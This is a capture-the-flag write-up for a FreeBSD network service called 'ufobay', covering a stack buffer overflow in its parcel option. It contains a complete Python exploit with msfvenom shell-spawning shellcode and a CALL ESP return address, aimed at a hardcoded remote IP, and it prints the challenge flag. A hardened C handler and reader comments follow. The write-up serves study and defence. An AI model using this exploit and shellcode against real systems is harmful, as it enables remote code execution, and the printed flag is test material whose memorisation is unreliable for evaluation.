The given binary is a 32-bit, statically linked FreeBSD ELF executable. After setting up a FreeBSD 9.1 VM, I started analysing the binary. It requires a user ufobay and the database file /home/ufobay/ufobay.db. We noticed a buffer overflow vulnerability in option 1, where the program reads the parcel: the user can supply 256 bytes of data, and 172 bytes are enough to overwrite the saved EIP.
Here is the idea of the exploit:
[*] Overwrite saved EIP with CALL ESP gadget
[*] Place the shellcode immediately after the CALL ESP gadget
Below is the exploit:
#!/usr/bin/env python
import struct
import socket
import time

# msfvenom -p bsd/x86/exec CMD='/bin/sh -c sh<&5 >&5' -a x86_64 -b '\x0a'
shellcode = (
    "\x6a\x3b\x58\x99\x52\x68\x2d\x63\x00\x00\x89\xe7\x52\x68" +
    "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\xe8\x15" +
    "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20" +
    "\x73\x68\x3c\x26\x35\x20\x3e\x26\x35\x00\x57\x53\x89\xe1" +
    "\x52\x51\x53\x50\xcd\x80")

ret_addr = struct.pack("<I", 0x080ff46d)  # call esp
NOP = struct.pack("B", 0x90)
EBP = struct.pack("<I", 0x0815c080)

# 168 bytes of padding, saved EBP, saved EIP (call esp), then the shellcode
payload = NOP * 168 + EBP + ret_addr + shellcode

ip = '92.63.96.226'
#ip = '192.168.122.200'
port = 1337

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
time.sleep(1)
print soc.recv(1024)

# option
soc.send("1\n")
time.sleep(0.5)
print soc.recv(512)

# source
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)

# destination
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)

# size
soc.send(str(len(payload)) + "\n")
time.sleep(0.5)
print soc.recv(512)

# parcel
soc.send(payload + "\n")
time.sleep(0.5)

soc.send("cat key\n")
time.sleep(0.5)
print soc.recv(1024)

The flag for the challenge is H0wCanW3D3F3atAL1ENZ.
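The root cause above is a client-announced length used directly as the copy size into a fixed stack buffer. As an added illustration (not the ufobay binary's code; PARCEL_MAX is an assumed buffer size and the peer is an in-memory stand-in for the socket), this is the hardened shape of the option-1 handler: the size line is parsed strictly and checked against the buffer before any copy, and the read itself is bounded.

```c
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* PARCEL_MAX is an assumed stack-buffer size; the write-up only says the
 * client may supply 256 bytes and that 172 bytes reach the saved EIP. */
#define PARCEL_MAX 160

/* In-memory stand-in for the TCP peer so the example runs offline. */
struct peer { const uint8_t *data; size_t len, pos; };

static size_t peer_read(struct peer *p, uint8_t *dst, size_t n) {
    size_t avail = p->len - p->pos;
    if (n > avail) n = avail;        /* never read past what the peer sent */
    memcpy(dst, p->data + p->pos, n);
    p->pos += n;
    return n;
}

/* Strict parse of the "size" answer: decimal digits, optional trailing
 * newline, non-zero, and never larger than the destination buffer.
 * Returns the accepted size or -1; a size above the buffer is exactly
 * the request the original service let through. */
static int parse_parcel_size(const char *line, size_t cap) {
    char *end;
    if (line[0] < '0' || line[0] > '9') return -1;   /* no sign, no blanks */
    errno = 0;
    unsigned long v = strtoul(line, &end, 10);
    if (*end == '\n') end++;
    if (errno || *end != '\0' || v == 0 || v > cap) return -1;
    return (int)v;
}

/* Hardened option-1 handler: the announced size is checked against the
 * buffer before any copy, and the copy itself is bounded.
 * Returns bytes stored, or -1 when the request is rejected. */
static int get_parcel_checked(struct peer *p, const char *size_line) {
    uint8_t parcel[PARCEL_MAX];
    int want = parse_parcel_size(size_line, sizeof parcel);
    if (want < 0) return -1;
    return (int)peer_read(p, parcel, (size_t)want);
}

/* Constructed 256-byte body standing in for a client's parcel data. */
static uint8_t sample_body[256];

static int handle_request(const char *size_line) {
    struct peer p = { sample_body, sizeof sample_body, 0 };
    return get_parcel_checked(&p, size_line);
}
```

With this check in place, the 256-byte request the exploit relies on is refused before any byte is copied, while parcels up to the buffer size are still accepted.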
Could you please share the challenge file?

Thank you very much :)

http://www.mediafire.com/?nj4dhguho92kqgn